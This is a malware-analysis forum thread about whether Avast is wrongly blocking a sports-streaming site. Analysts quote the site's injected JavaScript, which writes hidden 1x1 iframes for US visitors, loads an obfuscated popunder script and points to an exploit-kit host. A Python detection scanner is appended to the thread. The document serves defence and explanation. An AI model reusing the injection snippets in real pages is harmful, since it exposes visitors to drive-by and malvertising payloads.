Author Topic: False Positive?  (Read 4677 times)


Offline NVF (Full Member, Posts: 105)
False Positive?
« on: October 06, 2015, 05:35:59 PM »
Code:
http://idimsports.eu/watch/137670/1/watch-espn.html#.VhPqI_lViko
Avast appears to be blocking the stream at the above site. The site itself comes up clean with VirusTotal.

Thanks.

Offline NVF (Full Member, Posts: 105)
Re: False Positive?
« Reply #2 on: October 06, 2015, 05:54:50 PM »
JS:ScriptIP-inf [Trj] is the infection it gives. I find this a little strange because this site is the same as an old one but under another name and I didn't have any problems then.

Thanks

Offline Pondus (Probably Bot, Posts: 37529, Not an avast user)
Re: False Positive?
« Reply #3 on: October 06, 2015, 06:02:03 PM »
Quote
The site itself comes up clean with VirusTotal.
VirusTotal does not scan for infections; it is a blacklist check.


HTML scan is clean ... it seems Web Shield does not like the hidden iframe, as seen in the links above
https://www.virustotal.com/en/file/a12c48c9b70a85baeb2fce11726c98cc499207bdfe4f67b559fc30bf6ba22a1e/analysis/


the URL in the iframe gives this   https://sitecheck.sucuri.net/results/s.cdnco.us/
Malware entry: MW:EXPLOITKIT:BLACKHOLE1  http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1.php


« Last Edit: October 06, 2015, 06:05:15 PM by Pondus »

Offline NVF (Full Member, Posts: 105)
Re: False Positive?
« Reply #4 on: October 06, 2015, 06:06:45 PM »
VirusTotal does not scan for infections, it is a blacklist check

There's a blacklist database?

So is this a false positive by Avast! you think?

Offline Pondus (Probably Bot, Posts: 37529, Not an avast user)
Re: False Positive?
« Reply #5 on: October 06, 2015, 06:12:20 PM »
Quote
There's a blacklist data base?
Many ... you see them listed in VT after a URL scan   ;)


Quote
So is this a false positive by Avast! you think?
report it here and ask   https://support.avast.com  ->  avast virus lab



Offline NVF (Full Member, Posts: 105)
Re: False Positive?
« Reply #6 on: October 06, 2015, 06:21:15 PM »
Many ... you see them listed in VT after a URL scan   ;)

But those sites blacklist URLs based on whether they've found infections so a VirusTotal scan is indirectly scanning for infections, no?

report it here and ask   https://support.avast.com  ->  avast virus lab

I'll do that. Thanks.
« Last Edit: October 06, 2015, 06:26:03 PM by NVF »

Offline Pondus (Probably Bot, Posts: 37529, Not an avast user)
Re: False Positive?
« Reply #7 on: October 06, 2015, 06:30:45 PM »
Quote
But those sites blacklist URLs based on whether they've found infections in them so a VirusTotal scan is indirectly scanning for infections, no?
Yes / no ... if CNN.com got hacked and infected today, it will take some time before it ends up on a blacklist. It is usually those with bad IT staff that don't bother to fix issues.
Also consider what the issue is: there are many reasons for blacklisting, spam / phishing / infections ....

See hpHosts classifications as example  http://hosts-file.net/?s=classifications
« Last Edit: October 06, 2015, 07:16:57 PM by Pondus »

Offline polonus (Avast Überevangelist, Probably Bot, Posts: 33900, malware fighter)
Re: False Positive?
« Reply #8 on: October 06, 2015, 06:37:46 PM »
For starters, the DrWeb URL checker gives your link as clean,
but I see the following alerts when it is specifically scanned.

Suspicious on iFrame check are:
Suspicious

-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90'
-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;c=7;d=9;w=300;h=250'
-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90'
-http://s.cdnco.us/vvdim.htm?/watch/137670/1/watch-espn.html'

On a javascript check this is being flagged:
Suspicious

%" colspan="2"><br><iframe src="-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90" frameborder=0 marginheight=0 marginwidth=0 sc

The following included scripts should be checked:
Suspect - please check list for unknown includes


Suspicious Script:
   -http://show.yeabble.com/yeabblepopfr.js
   document.write(unescape('%3cscript type="text/javascript"  * clean src="-http://creative.ad120m.com/matomy/scripts/popunder/popunder.js"%3e%3c/scr'+'i
Suspicious Script:
   -http://show.yeabble.com/yeabblefooterfrfeed.js * Clean
   document.write("<script src='\/\/t.mdn2015x1.com\/build\/9ccc9baf\/v1\/'><\/script>");
Suspicious Script:
   -http://show.yeabble.com/matofrpopsec.js * clean
   document.write(unescape('%3cscript type="text/javascript" src="-http://creative.admtpmp127.com/admtpmp127/scripts/popup/popup.js"%3e%3c/scr'+
with a very poor web reputation: https://www.mywot.com/en/scorecard/creative.admtpmp127.com?utm_source=addon&utm_content=warn-viewsc

For starters I would block the following third-party links, going to -magnetic.t.domdex.com, -pulsepoint-cm.p.veruta.com, pxgp2.adpredictive.com, -p.adpdx.com, -rdcdn.com, zl1.zeroredirect1.com and -ck.adohana.com,
with a script or a request blocker.

See for alerts on website: https://urlquery.net/report.php?id=1444148063174
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fidimsports.eu%2Fwatch%2F137670%2F1%2Fwatch-espn.html%23.VhPqI_lViko
second link currently safe: http://adguard.com/en/adguard-report/show.yeabble.com/report.html
and this has been blocked in my browser: uMatrix has prevented the following page from loading:
htxp://s7.addthis.com/

This Dutch-hosted website is therefore not without problems. I would be rather careful or shun it.

polonus (volunteer website security analyst and website error-hunter)
« Last Edit: October 06, 2015, 06:39:51 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline NVF (Full Member, Posts: 105)
Re: False Positive?
« Reply #9 on: October 06, 2015, 06:42:10 PM »
Okay. Thanks for the replies and data. Just find it odd to a degree that this site is now a potential problem when it was fine under another name, but their address did change so maybe other things did as well.

Thanks again!

Offline polonus (Avast Überevangelist, Probably Bot, Posts: 33900, malware fighter)
Re: False Positive?
« Reply #10 on: October 06, 2015, 07:02:08 PM »
Hi NVF,

It just depends on how securely the browser is tweaked to avoid the adware and tracking dangers there and the occasional dropper. With a good and decent script blocker and a decent adblocker, your experience may not have differed that much from the previous time.
Well, you have been alerted to the fact that sites like these use the visitors as a product in their pay model and that real content is only additional for them, always is, and especially today "free comes at a price". As things stand now I would not go to that site; they have to clean up their act first.

greetings from the Netherlands,

polonus

Offline HonzaZ (Avast team, Advanced Poster, Posts: 1038)
Re: False Positive?
« Reply #11 on: October 07, 2015, 10:28:22 AM »
I do not think this is a False Positive - Avast complains about this piece of code:

Code:
if(document.location.hostname == "firstrowsports.uk.to"){window.location = "http://firstrowas.eu/sport/football.html";}
While this particular code seems clean, it cannot be said that redirections by JS are a neat way to do things. Why not use a 301 header, if you want to redirect?

Also, this alone would qualify for blocking the whole domain:

Code:
if(country2 == "US"){
document.write('<iframe src="http://www.vid4fun.net/v4f.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.trailernow.net/tn.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.everclips.net/evr.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.123trailers.net/1tr.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.govids.net/gov.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.hiclips.net/hic.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.ivids.net/ivd.php" height="1" width="1" border="0" scrolling="no"></iframe>');
}

Honza
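The checks that polonus (reply #8) and HonzaZ (reply #11) ran by hand, as an added example that is not Avast's Web Shield logic and not code from the site or from anyone in this thread: a small Python static scanner that takes a locally saved copy of a page and flags the constructs discussed above: hidden 1x1 iframes, iframe/script tags injected through document.write (including the %3c-encoded unescape form), injection gated on hostname or country, JavaScript redirects, and script includes pulled from other domains. This is also the difference Pondus draws between a blacklist lookup and a content scan: the scanner looks at what the page actually serves, so a freshly injected page is caught before any blacklist lists it. The sample page is constructed for the example from the snippets quoted in the thread; the page host idimsports.eu comes from the thread, and every heuristic (the regexes, the 1px "hidden" threshold, the flat if(){} matcher) is the example's own assumption, not a standard.

```python
"""Static triage of a saved HTML page for the constructs flagged in this thread.
Added example, not Avast Web Shield logic and not the site's code.  SAMPLE_HTML is
constructed from the snippets quoted in the thread; every heuristic here is the example's own."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page; hostnames as quoted in the thread, page host idimsports.eu.
SAMPLE_HTML = """<html><body><p>Stream loading...</p>
<iframe src="http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90" frameborder=0></iframe>
<iframe src="http://s.cdnco.us/vvdim.htm?/watch/137670/1/watch-espn.html" height="1" width="1"></iframe>
<script>
if(document.location.hostname == "firstrowsports.uk.to"){window.location = "http://firstrowas.eu/sport/football.html";}
if(country2 == "US"){
document.write('<iframe src="http://www.vid4fun.net/v4f.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.trailernow.net/tn.php" height="1" width="1" border="0" scrolling="no"></iframe>');
}
</script>
<script>document.write(unescape('%3cscript type="text/javascript" src="http://creative.ad120m.com/matomy/scripts/popunder/popunder.js"%3e%3c/scr'+'ipt%3e'));</script>
<script src="http://show.yeabble.com/yeabblepopfr.js"></script>
</body></html>"""

WRITE_RE = re.compile(r"document\.write\s*\((.*?)\)\s*;", re.S | re.I)       # one write(...) call
TAG_RE = re.compile(r"<\s*(iframe|script|object|embed)\b([^>]*)", re.I)       # tag name + raw attrs
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")
REDIRECT_RE = re.compile(r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*[\"']([^\"']+)", re.I)
COND_RE = re.compile(r"if\s*\(([^)]*)\)\s*\{([^}]*)\}", re.S)                  # flat if(...){...} only

class _Collector(HTMLParser):
    """Gather <iframe> attrs, external script src values and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.iframes, self.script_srcs, self.inline, self._buf = [], [], [], None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "script":
            self._buf = []                      # start collecting an inline script body
    def handle_data(self, data):
        if self._buf is not None:               # script text may arrive in several chunks
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def _attrs(text):
    """Attribute dict from the raw attribute text of a tag found inside a JS string."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(text)}

def _hidden(attrs):
    """1x1/zero-size or CSS-hidden frame: the classic drive-by carrier (1px threshold is ours)."""
    def tiny(v):
        try:
            return float(v.lower().rstrip("px")) <= 1
        except (ValueError, AttributeError):
            return False
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)

def scan_html(html, page_host):
    """Return a list of {"kind": ..., "detail": ...} findings for one page."""
    c = _Collector()
    c.feed(html)
    c.close()
    out = []
    def offsite(url):                           # host differs from the page and is not a subdomain
        h = urlparse(url).hostname or ""
        return bool(h) and h != page_host and not h.endswith("." + page_host)
    for a in c.iframes:                         # static iframes
        src = a.get("src", "")
        if _hidden(a):
            out.append({"kind": "hidden_iframe", "detail": src})
        elif offsite(src):
            out.append({"kind": "offsite_iframe", "detail": src})
    for src in c.script_srcs:                   # includes pulled from other domains
        if offsite(src):
            out.append({"kind": "third_party_script", "detail": src})
    for js in c.inline:
        for m in WRITE_RE.finditer(js):         # tags injected via document.write
            payload = unquote(m.group(1)).replace("\\/", "/")   # undo %3c and \/ obfuscation
            for t in TAG_RE.finditer(payload):
                at = _attrs(t.group(2))
                detail = at.get("src", payload[:60])
                if t.group(1).lower() == "iframe" and _hidden(at):
                    detail += " (hidden)"
                out.append({"kind": "written_" + t.group(1).lower(), "detail": detail})
        for m in REDIRECT_RE.finditer(js):      # JS redirects (a 301 would be the honest way)
            out.append({"kind": "js_redirect", "detail": m.group(1)})
        for cond, body in COND_RE.findall(js):  # behaviour gated on hostname / country
            if REDIRECT_RE.search(body):
                out.append({"kind": "conditional_redirect", "detail": cond.strip()})
            if WRITE_RE.search(body) and TAG_RE.search(unquote(body)):
                out.append({"kind": "conditional_injection", "detail": cond.strip()})
    return out
```

Run it with `scan_html(open("page.html").read(), "idimsports.eu")` on a copy saved with the browser or with curl; on the constructed sample it reports one hidden iframe (s.cdnco.us), one off-site iframe (zedo), one third-party include (show.yeabble.com), two written 1x1 iframes plus one written script, the JS redirect, and the two conditional blocks. A geo-gated payload is the reason a scanner sitting outside the targeted country, or a blacklist fed by such scanners, can report the page as clean while a US visitor gets the iframes, so treat "clean" from any remote checker as a statement about what that checker was served, not about the page.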